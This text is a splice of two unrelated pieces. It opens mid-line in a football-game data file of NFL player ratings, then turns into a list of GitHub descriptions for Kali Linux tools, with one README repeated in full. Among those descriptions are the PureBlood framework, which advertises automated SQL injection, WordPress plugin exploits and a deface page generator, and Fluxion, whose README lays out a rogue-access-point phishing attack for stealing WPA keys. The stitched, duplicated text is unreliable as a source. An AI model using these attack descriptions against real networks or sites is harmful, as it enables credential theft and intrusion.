Carr,24,2017,69,57,87,81,86,83,0.3,3 QB,Taysom Hill,27,2017,59,48,84,88,68,78,0.3,3 RB,Trey Edmunds,23,2017,63,52,82,77,90,81,0.3,3 END_PLAYERS ###################################################################### BUCCANEERS Tampa Bay Buccaneers,TB DL,Clinton McDonald,30,2009,64,74,84,88,87,82,1.8,1 QB,Ryan Fitzpatrick,35,2005,69,69,86,87,76,61,1.8,1 OL,Garrison Sanborn,32,2009,64,64,84,77,66,64,0.6,1 DL,Robert Ayers,32,2009,75,83,82,78,82,84,3.9,2 S,TJ Ward,31,2010,73,81,93,84,87,75,4.1,1 DL,Gerald McCoy,29,2010,70,88,86,92,94,88,9.8,5 RB,Luke Stocker,29,2011,68,72,88,69,81,69,1,1 RB,Jacquizz Rodgers,27,2011,81,78,87,88,87,88,1,2 DL,Chris Baker,30,2009,72,85,81,90,89,81,3.1,3 S,Chris Conte,28,2011,74,81,87,83,86,63,1.5,2 DL,Darryl Tapp,33,2006,45,75,87,71,77,82,0.6,1 WR,DeSean Jackson,31,2008,71,89,84,90,94,84,6.7,3 OL,Joe Hawley,29,2010,87,84,88,89,77,76,1.7,2 CB,Brent Grimes,34,2006,66,90,85,90,87,68,4,1 OL,Demar Dotson,32,2009,79,83,87,86,87,89,2.5,3 CB,Robert McClain,29,2010,64,71,84,84,87,66,0.5,1 DL,Sealver Siliga,27,2011,71,72,82,88,90,77,0.8,1 DL,William Gholston,26,2013,77,80,82,77,83,84,3.3,5 OL,Evan Smith,31,2009,65,78,84,85,77,77,2.1,1 RB,Doug Martin,28,2012,68,83,89,91,88,92,4.3,4 LB,Lavonte David,27,2012,89,88,95,89,84,88,6,4 S,Josh Robinson,26,2012,80,69,84,86,92,55,1.6,2 K,Bryan Anger,29,2012,68,70,90,95,94,70,2,5 S,Keith Tandy,28,2012,73,76,91,85,87,69,0.6,1 OL,JR Sweezy,28,2012,73,78,83,84,73,79,3.6,4 QB,Ryan Griffin,28,2013,65,54,85,84,76,49,0.5,2 DL,Will Clarke,26,2014,66,64,85,76,79,84,0.4,1 WR,Mike Evans,24,2014,85,96,91,88,88,83,4.7,2 RB,Charles Sims III,27,2014,77,81,86,81,89,82,0.6,1 OL,Kevin Pamphile,27,2014,80,74,84,82,74,75,0.6,1 K,Patrick Murray,26,2014,60,48,78,92,85,48,0.3,1 WR,Cameron Brate,26,2014,84,84,85,87,80,70,0.4,1 LB,Adarius Glanton,27,2014,73,67,85,79,82,79,0.4,1 QB,Jameis Winston,23,2015,80,80,96,95,80,78,6.3,2 OL,Ali Marpet,24,2015,90,87,86,88,81,77,0.7,2 OL,Donovan Smith,24,2015,89,78,82,88,73,75,1.3,2 DL,Ryan Russell,25,2015,69,66,77,78,76,84,0.4,1 LB,Kwon Alexander,23,2015,92,84,85,81,83,85,0.5,2 LB,Cameron Lynch,24,2015,74,58,88,76,82,75,0.3,1 WR,Adam Humphries,24,2015,85,86,82,88,88,75,0.4,1 WR,Freddie Martino,26,2014,69,56,84,78,89,79,0.4,1 WR,Bernard Reedy,26,2014,69,61,84,80,88,75,0.3,1 OL,Caleb Benenoch,23,2016,71,64,83,78,78,72,0.4,3 DL,Noah Spence,23,2016,81,71,85,80,81,88,1.3,3 CB,Vernon Hargreaves,22,2016,74,68,88,86,90,79,3.4,3 CB,Ryan Smith,24,2016,71,58,85,81,90,63,0.5,3 LB,Devante Bond,24,2016,75,63,84,74,77,78,0.4,3 OL,Leonard Wester,24,2016,61,48,84,79,72,76,0.3,2 CB,Javien Elliott,24,2016,67,61,85,79,86,74,0.3,1 RB,Peyton Barber,23,2016,71,56,86,77,86,79,0.3,2 WR,OJ Howard,23,2017,71,68,94,82,87,80,2.6,4 WR,Chris Godwin,21,2017,80,65,94,82,91,84,0.6,4 LB,Kendell Beckwith,23,2017,84,78,83,87,88,79,0.6,4 S,Justin Evans,22,2017,80,62,89,84,87,77,1.1,4 WR,Antony Auclair,24,2017,65,53,88,71,76,77,0.3,3 END_PLAYERS ###################################################################### CARDINALS Arizona Cardinals,ARZ WR,Jermaine Gresham,29,2010,67,79,88,86,81,80,5.2,4 QB,Carson Palmer,38,2003,64,86,92,91,81,47,15.1,2 DL,Frostee Rucker,34,2006,73,82,84,80,86,83,0.7,1 OL,Justin Drescher,29,2010,76,75,86,74,52,69,0.5,1 K,Phil Dawson,42,1998,48,65,78,92,89,65,2.1,2 QB,Blaine Gabbert,28,2011,79,74,89,88,75,63,0.5,1 WR,Larry Fitzgerald,34,2004,76,97,96,97,84,79,11,1 S,Antoine Bethea,33,2006,73,80,86,84,86,74,2.9,3 LB,Karlos Dansby,36,2004,41,81,88,89,89,76,1.6,1 DL,Corey Peters,29,2010,75,86,82,88,90,83,2.2,1 OL,Mike Iupati,30,2010,85,79,89,92,86,72,5.5,3 K,Andy Lee,35,2004,47,62,81,96,84,62,2.3,2 OL,Alex Boone,30,2009,75,77,84,90,74,77,0.5,1 QB,Drew Stanton,33,2007,40,74,86,89,76,50,2.5,1 CB,Tramon Williams,34,2006,38,75,90,85,84,59,1.5,1 OL,Jared Veldheer,30,2010,85,82,88,97,74,72,5.1,2 S,Tyvon Branch,31,2008,78,85,87,88,90,74,2.1,1 LB,Josh Bynes,28,2011,73,79,84,85,83,76,0.5,1 S,Tyrann Mathieu,25,2013,84,85,85,89,90,74,9.3,5 OL,Earl Watford,27,2013,80,76,90,85,73,70,0.5,1 RB,Adrian Peterson,32,2007,76,84,90,85,90,90,1.3,2 OL,AQ Shipley,31,2009,81,86,88,87,74,72,1.3,2 RB,Andre Ellington,28,2013,69,74,82,74,90,78,0.6,1 LB,Chandler Jones,27,2012,85,90,87,84,86,85,11.7,5 CB,Justin Bethel,27,2012,74,72,87,88,87,74,2.2,1 WR,Brittan Golden,29,2012,69,68,84,78,88,75,0.4,1 RB,Kerwynn Williams,26,2013,78,72,86,81,89,83,0.3,1 WR,Jaron Brown,27,2013,83,79,84,88,91,81,0.8,1 LB,Kareem Martin,25,2014,65,60,84,81,83,76,0.5,1 LB,Deone Bucannon,25,2014,85,83,90,84,83,86,2.6,2 WR,Troy Niklas,25,2014,64,58,85,78,77,72,0.8,1 WR,John Brown,27,2014,77,81,82,88,94,83,0.7,1 OL,John Wetzel,26,2013,71,67,83,86,79,71,0.3,1 DL,Josh Mauro,26,2014,74,74,90,85,85,78,2,2 RB,David Johnson,26,2015,90,90,91,91,92,94,0.5,2 WR,JJ Nelson,25,2015,78,78,77,84,96,75,0.4,2 OL,DJ Humphries,24,2015,82,68,86,88,81,73,2,2 DL,Rodney Gunter,25,2015,77,68,81,75,81,81,0.5,2 LB,Markus Golden,26,2015,81,85,86,79,77,79,0.7,2 DL,Olsen Pierre,26,2015,71,64,82,79,82,80,0.3,1 DL,Xavier Williams,25,2015,70,68,86,83,82,77,0.3,1 RB,DJ Foster,24,2016,63,50,85,76,90,81,0.4,2 OL,Max Tuerk,23,2016,68,62,86,79,81,77,0.7,3 OL,Evan Boehm,24,2016,86,75,90,83,77,72,0.5,3 DL,Robert Nkemdiche,23,2016,72,69,86,81,83,89,2,3 LB,Scooby Wright III,23,2016,82,72,83,79,81,79,0.3,1 CB,Brandon Williams,25,2016,70,60,90,82,93,62,0.6,3 RB,Elijhaa Penny,24,2016,78,62,80,81,81,82,0.3,1 S,Budda Baker,21,2017,73,65,89,82,91,72,1.5,4 OL,Will Holden,24,2017,73,59,86,85,77,72,0.4,4 LB,Haason Reddick,23,2017,76,71,88,80,83,84,3.2,4 S,Rudy Ford,23,2017,77,57,87,80,92,74,0.4,4 RB,Ricky Seals-Jones,22,2017,68,48,84,70,83,71,0.3,3 WR,Chad Williams,23,2017,66,55,87,84,90,80,0.6,4 END_PLAYERS ###################################################################### RAMS Los Angeles Rams,LAR OL,Andrew Whitworth,36,2006,81,95,90,94,86,85,7.7,3 LB,Robert Quinn,27,2011,82,83,87,80,87,83,7.4,3 DL,Tyrunn Walker,27,2012,72,66,80,82,81,79,0.5,1 WR,Tavon Austin,26,2013,79,77,87,77,95,82,6.1,5 OL,Rodger Saffold,29,2010,71,80,80,84,85,72,4.4,2 LB,Alec Ogletree,26,2013,79,80,87,86,81,84,2.4,1 WR,Robert Woods,25,2013,79,81,90,86,91,79,4.1,5 OL,Jake McQuaide,30,2011,77,65,82,72,50,62,0.6,1 CB,Kayvon Webster,26,2013,76,76,91,86,90,82,2.3,2 LB,Connor Barwin,31,2009,72,77,91,79,83,83,2.1,1 OL,John Sullivan,32,2008,76,83,92,86,77,75,0.7,1 LB,Mark Barron,28,2012,70,78,86,83,81,83,6,4 DL,Michael Brockers,27,2012,87,86,88,87,91,87,6.9,3 CB,Trumaine Johnson,27,2012,77,85,83,88,88,79,10,1 K,Greg Zuerlein,30,2012,64,63,83,95,89,63,1.5,3 K,Johnny Hekker,27,2012,79,70,85,97,96,70,1.9,4 RB,Lance Dunbar,27,2012,71,74,79,77,91,83,0.9,1 WR,Derek Carrier,27,2012,74,70,83,77,87,77,0.6,1 CB,Nickell Robey,25,2013,83,82,87,90,89,49,0.6,1 S,Cody Davis,28,2013,68,68,84,86,90,71,0.9,1 WR,Sammy Watkins,24,2014,87,79,89,86,92,88,4.9,1 DL,Dominique Easley,25,2014,75,79,77,83,84,82,1.1,1 S,Lamarcus Joyner,27,2014,84,83,88,87,88,69,1,1 OL,Cornelius Lucas,26,2014,73,70,80,75,77,75,0.4,1 DL,Ethan Westbrooks,27,2014,74,76,82,82,80,80,1.1,1 QB,Sean Mannion,25,2015,63,56,87,88,74,50,0.6,2 RB,Todd Gurley,23,2015,91,90,86,88,92,91,3.3,2 OL,Andrew Donnal,25,2015,66,67,84,77,75,74,0.5,2 OL,Jamon Brown,24,2015,74,75,82,87,82,71,0.6,2 OL,Rob Havenstein,25,2015,75,85,85,84,87,73,0.8,2 LB,Bryce Hager,25,2015,66,65,83,83,84,78,0.4,2 CB,Troy Hill,26,2015,66,64,87,84,87,60,0.3,1 LB,Matt Longacre,26,2015,69,66,86,73,77,77,0.4,1 OL,Darrell Williams,24,2015,76,57,83,75,77,78,0.3,1 RB,Malcolm Brown,24,2015,68,55,85,80,89,78,0.3,1 QB,Jared Goff,23,2016,77,81,91,92,81,59,7,3 QB,Brandon Allen,25,2016,56,51,83,88,74,47,0.4,3 WR,Pharoh Cooper,22,2016,71,61,86,78,87,72,0.5,3 RB,Tyler Higbee,24,2016,85,75,88,75,80,78,0.5,3 S,Marqui Christian,23,2016,70,56,87,79,88,74,0.4,3 S,Blake Countess,24,2016,72,49,84,79,88,57,0.3,2 WR,Mike Thomas,23,2016,73,55,89,76,88,72,0.4,3 OL,Austin Blythe,25,2016,70,54,94,82,80,73,0.4,3 LB,Cory Littleton,24,2016,73,63,83,69,72,77,0.3,2 DL,Morgan Fox,23,2016,75,65,89,84,86,84,0.3,1 WR,Gerald Everett,23,2017,78,63,86,83,85,80,1.3,4 WR,Cooper Kupp,24,2017,75,75,89,87,87,81,0.7,4 DL,Tanzel Smart,23,2017,72,68,83,81,81,77,0.4,4 LB,Ejuan Price,24,2017,68,60,80,78,81,75,0.4,4 S,John Johnson,22,2017,72,67,90,84,85,74,0.6,4 WR,Josh Reynolds,22,2017,77,65,86,85,88,75,0.6,4 LB,Samson Ebukam,22,2017,74,62,89,81,85,81,0.5,4 RB,Justin Davis,22,2017,73,52,85,75,88,83,0.3,3 CB,Dominique Hatfield,23,2017,72,53,85,77,85,63,0.3,3 END_PLAYERS ###################################################################### SEAHAWKS Seattle Seahawks,SEA DL,Michael Bennett,32,2009,70,84,88,90,94,89,6.8,4 DL,Dwight Freeney,37,2002,71,76,80,73,75,83,0.6,1 LB,KJ Wright,28,2011,74,86,90,92,84,80,4.8,2 CB,Neiko Thorpe,27,2012,61,54,87,81,90,67,1.2,2 DL,Cliff Avril,31,2008,69,87,89,76,77,86,4.5,2 OL,Luke Joeckel,26,2013,79,72,86,87,74,74,6.9,1 DL,Dion Jordan,27,2013,73,61,81,66,77,91,0.4,1 DL,Sheldon Richardson,27,2013,75,78,86,88,94,89,3,1 RB,Eddie Lacy,27,2013,78,77,90,85,86,85,3.4,1 WR,Jimmy Graham,31,2010,77,86,86,86,85,80,6,1 S,Earl Thomas III,28,2010,73,91,91,92,91,76,6.6,2 K,Jon Ryan,36,2006,66,64,82,89,82,64,1.9,3 OL,Duane Brown,32,2008,74,92,90,90,87,86,5.3,2 OL,Oday Aboushi,26,2013,84,78,90,78,73,73,0.7,1 WR,Doug Baldwin,29,2011,79,95,88,94,90,78,6.3,4 WR,Luke Willson,27,2013,80,74,82,82,87,75,1.6,1 LB,Bobby Wagner,27,2012,91,93,90,97,89,90,7.6,3 QB,Russell Wilson,29,2012,90,89,97,93,85,79,14.2,3 LB,Michael Wilhoite,31,2011,69,76,87,83,81,81,1.2,1 CB,Jeremy Lane,27,2012,80,76,85,87,88,68,4.2,3 K,Blair Walsh,27,2012,61,52,86,94,78,52,0.7,1 QB,Austin Davis,28,2012,63,66,87,85,77,63,0.5,1 CB,DeShawn Shead,29,2012,68,82,85,86,87,83,0.8,1 OL,Matt Tobin,27,2013,66,67,85,79,75,73,0.5,1 LB,Terence Garvin,26,2013,70,64,86,78,76,76,0.5,1 S,Brad McDougald,27,2013,74,81,86,85,88,72,1.5,1 OL,Justin Britt,26,2014,89,90,84,87,83,76,5,4 WR,Paul Richardson,25,2014,83,79,83,85,94,79,1,1 LB,Marcus Smith II,25,2014,70,69,85,76,79,78,0.4,1 WR,Tyler Lockett,25,2015,78,79,83,86,93,82,0.6,2 OL,Mark Glowinski,25,2015,72,69,89,91,73,70,0.4,2 DL,Frank Clark,24,2015,88,78,80,88,80,82,0.7,2 LB,DJ Alexander,26,2015,73,65,79,78,75,80,0.4,2 CB,Justin Coleman,24,2015,77,71,86,85,88,67,0.4,1 RB,Thomas Rawls,24,2015,82,81,84,81,80,84,0.3,1 DL,Garrison Smith,26,2014,70,59,86,86,85,76,0.3,1 OL,Tyler Ott,25,2014,56,48,84,71,50,54,0.3,1 RB,CJ Prosise,23,2016,76,68,84,80,90,84,0.6,3 RB,Nick Vannett,24,2016,75,57,84,73,76,75,0.6,3 OL,Germain Ifedi,23,2016,75,77,86,82,72,76,1.9,3 DL,Jarran Reed,25,2016,80,72,87,90,92,83,1,3 LB,Josh Forrest,25,2016,74,58,90,69,70,76,0.3,1 DL,Quinton Jefferson,24,2016,67,51,84,79,81,84,0.4,3 WR,Tanner McEvoy,24,2016,69,62,87,79,87,79,0.3,2 RB,JD McKissic,24,2016,76,65,86,69,88,79,0.3,1 WR,Amara Darboh,23,2017,76,67,88,82,91,80,0.6,4 DL,Nazair Jones,23,2017,85,70,83,87,86,80,0.6,4 OL,Ethan Pocic,22,2017,79,69,88,85,83,76,0.9,4 CB,Shaquill Griffin,22,2017,71,68,88,85,92,78,0.6,4 S,Delano Hill,22,2017,80,62,88,78,86,76,0.6,4 S,Tedric Thompson,22,2017,82,65,85,81,86,71,0.6,4 RB,Christopher Carson,23,2017,81,77,82,88,86,84,0.4,4 OL,Jordan Roos,24,2017,74,51,84,94,77,70,0.3,3 END_PLAYERS ###################################################################### 49ERS San Francisco 49ers,SF K,Robbie Gould,36,2005,49,59,80,94,85,59,1.3,2 CB,Leon Hall,33,2007,62,69,89,81,87,77,0.6,1 OL,Zane Beadles,31,2010,67,77,90,83,72,69,2.5,2 DL,Elvis Dumervil,33,2006,59,79,85,78,81,84,2.7,2 LB,Dekoda Watson,29,2010,66,64,80,73,72,80,1.2,3 WR,Aldrick Robinson,29,2011,68,75,83,79,92,78,1.3,2 OL,Brandon Fusco,29,2011,79,73,80,89,85,73,0.8,1 WR,Pierre Garcon,31,2008,82,95,87,95,89,81,7.1,5 LB,Malcolm Smith,28,2011,76,81,83,82,81,84,4,5 DL,Tony McDaniel,32,2006,68,79,79,88,89,77,0.6,1 OL,Daniel Kilgore,30,2011,73,79,86,89,72,74,1.1,1 OL,Joe Staley,33,2007,57,94,90,92,83,78,4.8,3 DL,Leger Douzable,31,2008,66,79,81,83,86,78,0.5,1 S,Eric Reid,26,2013,84,78,87,87,88,67,2.4,1 DL,Datone Jones,27,2013,72,76,84,81,79,82,0.5,1 DL,Tank Carradine,27,2013,84,79,82,90,89,88,2.3,1 OL,Kyle Nelson,31,2011,73,66,84,68,52,62,0.7,2 WR,Marquise Goodwin,27,2013,77,78,82,81,95,75,2.5,2 DL,Earl Mitchell,30,2010,63,71,83,80,82,84,2.8,4 RB,Kyle Juszczyk,26,2013,85,85,91,80,82,79,3.9,4 WR,Garrett Celek,29,2012,65,66,80,78,80,72,1.9,3 LB,Ray-Ray Armstrong,26,2013,80,74,84,81,76,80,1.1,2 CB,Dontae Johnson,26,2014,71,69,87,85,91,64,0.5,1 RB,Carlos Hyde,26,2014,84,85,87,86,89,90,0.7,1 QB,Jimmy Garoppolo,26,2014,79,75,92,90,81,61,0.6,1 S,Jimmie Ward,26,2014,76,78,90,87,90,71,2.4,2 DL,Aaron Lynch,24,2014,79,75,81,76,80,86,0.6,1 CB,K'Waun Williams,26,2014,77,67,87,84,88,68,0.4,1 LB,Brock Coyle,27,2014,73,69,90,79,81,81,1.1,1 OL,Laken Tomlinson,25,2015,71,74,86,87,74,73,2,2 OL,Trent Brown,24,2015,83,87,80,91,80,88,0.4,2 DL,Arik Armstead,24,2015,83,77,82,85,88,85,2.3,2 LB,Eli Harold,23,2015,73,66,86,77,81,80,0.6,2 S,Jaquiski Tartt,25,2015,76,81,89,85,89,66,1,2 K,Bradley Pinion,23,2015,70,55,81,91,76,55,0.4,2 RB,Raheem Mostert,25,2015,75,62,86,71,93,79,0.3,1 OL,Joshua Garnett,23,2016,86,76,88,84,74,72,2.1,3 DL,DeForest Buckner,23,2016,79,86,91,86,89,89,4.4,3 DL,Ronald Blair,24,2016,64,55,87,84,84,85,0.4,3 S,Dexter McCoil,26,2015,73,61,90,79,86,68,0.3,2 QB,CJ Beathard,24,2017,75,63,86,91,77,67,0.6,4 OL,Erik Magnuson,23,2017,76,62,81,81,75,75,0.3,3 DL,Solomon Thomas,22,2017,80,68,92,91,90,88,7,4 LB,Reuben Foster,23,2017,76,72,82,85,88,81,2.1,4 LB,Elijah Lee,21,2017,75,57,90,80,77,78,0.4,4 CB,Ahkello Witherspoon,22,2017,67,63,84,85,91,55,0.7,4 S,Adrian Colbert,24,2017,64,57,86,78,89,60,0.4,4 DL,DJ Jones,22,2017,79,58,89,89,85,83,0.4,4 LB,Pita Taumoepenu,23,2017,76,56,89,71,77,75,0.4,4 WR,George Kittle,24,2017,78,73,85,82,87,74,0.4,4 WR,Trent Taylor,23,2017,73,63,88,86,86,83,0.4,4 WR,Kendrick Bourne,22,2017,67,53,81,77,87,79,0.3,3 RB,Matt Breida,22,2017,76,67,85,82,93,82,0.3,3 WR,Victor Bolden Jr.,22,2017,71,54,87,78,90,75,0.3,3 OL,Darrell Williams,24,2017,67,53,86,78,74,75,0.3,1 END_PLAYERS
alejandromume
The new Kali Linux console bringed to Ubuntu
oparkins
Ansible scripts to install tools and files wanted on a new Kali Machine
LinterexEvilCommunity
License Compatible Python2x Python3x Pure Blood v2 A Penetration Testing Framework created for Hackers / Pentester / Bug Hunter Menu Web Pentest / Information Gathering: Banner Grab Whois Traceroute DNS Record Reverse DNS Lookup Zone Transfer Lookup Port Scan Admin Panel Scan Subdomain Scan CMS Identify Reverse IP Lookup Subnet Lookup Extract Page Links Directory Fuzz (NEW) File Fuzz (NEW) Shodan Search (NEW) Shodan Host Lookup (NEW) Web Application Attack: (NEW) Wordpress | WPScan | WPScan Bruteforce | Wordpress Plugin Vulnerability Checker Features: // I will add more soon. | WordPress Woocommerce - Directory Craversal | Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting | WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion | WordPress Plugin Events Calendar - 'event_id' SQL Injection Auto SQL Injection Features: | Union Based | (Error Output = False) Detection | Tested on 100+ Websites Generator: Deface Page Password Generator // NEW Text To Hash //NEW Author's Words: This project is managed / enhanced everyday and sorry if it takes a while before another version is published. Well, I'm the only one who is managing this and also I have personal daily activities. This tool is for everyone. So please open an issue if you run into a bug. Well I can only test it in Windows and Kali Linux since that's the only device I have. Also please try the new AUTO SQL Injection that I'm proud of currently. I created a video already on how I created it. Check it out on my Youtube Channel. The WPScan is also checked for Windows and Kali Linux. If you are using other Linux Distro please add wpscan in your ~/.bashrc. Installation Any Python Version. $ git clone https://github.com/cr4shcod3/pureblood $ cd pureblood $ pip install -r requirements.txt
BlackSnufkin
Bash Script to automate the process of setting up a new Kali Linux virtual machine to look a like HTB PwnBox
82goober82
Fluxion is the future of MITM WPA attacks Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) less bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. It's compatible with the latest release of Kali (rolling). Fluxion's attacks' setup is mostly manual, but experimental auto-mode handles some of the attacks' setup parameters. Read the FAQ before requesting issues. If you need quick help, fluxion is also avaible on gitter. You can talk with us on Gitter or on Discord. Installation Read here before you do the following steps. Download the latest revision git clone --recursive git@github.com:FluxionNetwork/fluxion.git Switch to tool's directory cd fluxion Run fluxion (missing dependencies will be auto-installed) ./fluxion.sh Fluxion is also available in arch cd bin/arch makepkg or using the blackarch repo pacman -S fluxion scroll Changelog Fluxion gets weekly updates with new features, improvements, and bugfixes. Be sure to check out the changelog here. :octocat: How to contribute All contributions are welcome! Code, documentation, graphics, or even design suggestions are welcome; use GitHub to its fullest. Submit pull requests, contribute tutorials or other wiki content -- whatever you have to offer, it'll be appreciated but please follow the style guide. book How it works Scan for a target wireless network. Launch the Handshake Snooper attack. Capture a handshake (necessary for password verification). Launch Captive Portal attack. Spawns a rogue (fake) AP, imitating the original access point. Spawns a DNS server, redirecting all requests to the attacker's host running the captive portal. Spawns a web server, serving the captive portal which prompts users for their WPA/WPA2 key. Spawns a jammer, deauthenticating all clients from original AP and lureing them to the rogue AP. All authentication attempts at the captive portal are checked against the handshake file captured earlier. The attack will automatically terminate once a correct key has been submitted. The key will be logged and clients will be allowed to reconnect to the target access point. For a guide to the Captive Portal attack, read the Captive Portal attack guide exclamation Requirements A Linux-based operating system. We recommend Kali Linux 2 or Kali rolling. Kali 2 & rolling support the latest aircrack-ng versions. An external wifi card is recommended. Related work For development I use vim and tmux. Here are my dotfiles :octocat: Credits l3op - contributor dlinkproto - contributor vk496 - developer of linset Derv82 - @Wifite/2 Princeofguilty - @webpages and @buteforce Photos for wiki @http://www.kalitutorials.net Ons Ali @wallpaper PappleTec @sites MPX4132 - Fluxion V3 Disclaimer Authors do not own the logos under the /attacks/Captive Portal/sites/ directory. Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. The usage of Fluxion for attacking infrastructures without prior mutual consent could be considered an illegal activity, and is highly discouraged by its authors/developers. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program. Note Beware of sites pretending to be related with the Fluxion Project. These may be delivering malware. Fluxion DOES NOT WORK on Linux Subsystem For Windows 10, because the subsystem doesn't allow access to network interfaces. Any Issue regarding the same would be Closed Immediately Links Fluxion website: https://fluxionnetwork.github.io/fluxion/ Discord: https://discordapp.com/invite/G43gptk Gitter: https://gitter.im/FluxionNetwork/Lobby
Pinperepette
A new revolution in the Penetration Testing scene... for kali Linux
cybereagle2001
this script is created by cybereagle2001, oussama ben hadj dahman, I thought that it so important to secure some documents that will allow people to conserve their own privacy so I created Crypto based on some kali linux tools. it's so easy to use. All what you need is to write or past your text after useing the encryption or decryption option and Crypto will create a new file where you will found your document encrypted or decrypted.
82goober82
Fluxion is the future of MITM WPA attacks Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) less bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. It's compatible with the latest release of Kali (rolling). Fluxion's attacks' setup is mostly manual, but experimental auto-mode handles some of the attacks' setup parameters. Read the FAQ before requesting issues. If you need quick help, fluxion is also avaible on gitter. You can talk with us on Gitter or on Discord. Installation Read here before you do the following steps. Download the latest revision git clone --recursive git@github.com:FluxionNetwork/fluxion.git Switch to tool's directory cd fluxion Run fluxion (missing dependencies will be auto-installed) ./fluxion.sh Fluxion is also available in arch cd bin/arch makepkg or using the blackarch repo pacman -S fluxion scroll Changelog Fluxion gets weekly updates with new features, improvements, and bugfixes. Be sure to check out the changelog here. :octocat: How to contribute All contributions are welcome! Code, documentation, graphics, or even design suggestions are welcome; use GitHub to its fullest. Submit pull requests, contribute tutorials or other wiki content -- whatever you have to offer, it'll be appreciated but please follow the style guide. book How it works Scan for a target wireless network. Launch the Handshake Snooper attack. Capture a handshake (necessary for password verification). Launch Captive Portal attack. Spawns a rogue (fake) AP, imitating the original access point. Spawns a DNS server, redirecting all requests to the attacker's host running the captive portal. Spawns a web server, serving the captive portal which prompts users for their WPA/WPA2 key. Spawns a jammer, deauthenticating all clients from original AP and lureing them to the rogue AP. All authentication attempts at the captive portal are checked against the handshake file captured earlier. The attack will automatically terminate once a correct key has been submitted. The key will be logged and clients will be allowed to reconnect to the target access point. For a guide to the Captive Portal attack, read the Captive Portal attack guide exclamation Requirements A Linux-based operating system. We recommend Kali Linux 2 or Kali rolling. Kali 2 & rolling support the latest aircrack-ng versions. An external wifi card is recommended. Related work For development I use vim and tmux. Here are my dotfiles :octocat: Credits l3op - contributor dlinkproto - contributor vk496 - developer of linset Derv82 - @Wifite/2 Princeofguilty - @webpages and @buteforce Photos for wiki @http://www.kalitutorials.net Ons Ali @wallpaper PappleTec @sites MPX4132 - Fluxion V3 Disclaimer Authors do not own the logos under the /attacks/Captive Portal/sites/ directory. Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. The usage of Fluxion for attacking infrastructures without prior mutual consent could be considered an illegal activity, and is highly discouraged by its authors/developers. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program. Note Beware of sites pretending to be related with the Fluxion Project. These may be delivering malware. Fluxion DOES NOT WORK on Linux Subsystem For Windows 10, because the subsystem doesn't allow access to network interfaces. Any Issue regarding the same would be Closed Immediately Links Fluxion website: https://fluxionnetwork.github.io/fluxion/ Discord: https://discordapp.com/invite/G43gptk Gitter: https://gitter.im/FluxionNetwork/Lobby
kj0317
Simple script to install AutoRecon, pip3, and other tools on a newly spun up OSCP Kali image.
overgrowncarrot1
a few install files for kali, should be used on a brand new install of kali
Shiva108
Backup (Clone) Your or other users starred repos from github. Eg After new kali install.
waldo-irc
Quickly Sets up Kali for Penetration Testing on a new system
GO0dspeed
Kali Linux setup scripts for new installs
spinabifida
Compatible with new Kali builds. No tweaks required.
F4l13n5n0w
handy-tools install script for each new Kali VM
nhooper
Kali Linux Shell Script for automatic basic network attacks - new to Unix shell scripting, critical feedback is expected and welcomed
D4RkNiK0l4s
Kali Linux Generator its a script that automates the building process of kali linux images (iso)!!! Added compability to create Kali linux: jessie,wheezy,sid,squeeze Added Desktops Building Capabilities E17 option Desktops Building Capabilities : XFCE,KDE,ICEWM,GNOME,MATE,LXDE,E17 option 1 :You can just build a Kali Linux image with any of the folowing desktop XFCE,KDE,ICEWM,GNOME,MATE,LXDE,E17 or option 2 : the created iso will be remixed (if you choose to remix distributions) with the current installed system ,what does this mean?? it mean that you will get a kali linux image with your current settings,wallpapers,documents(something like backup to a new operating system No comments.. this script is what any lazy people out there needs!! Youtube tutorial/preview : soon
CarterPerez-dev
For a new barebones Ubuntu instance, this script installs key tools: Git, Docker, Docker Compose, ZSH + Oh My ZSH. Includes popular plugins (syntax highlighting, autosuggestions, completions) & the Powerlevel10k theme, giving a feature-rich, colorful prompt similar to Kali Linux.
1337-42
Ansible based setup for new kali machines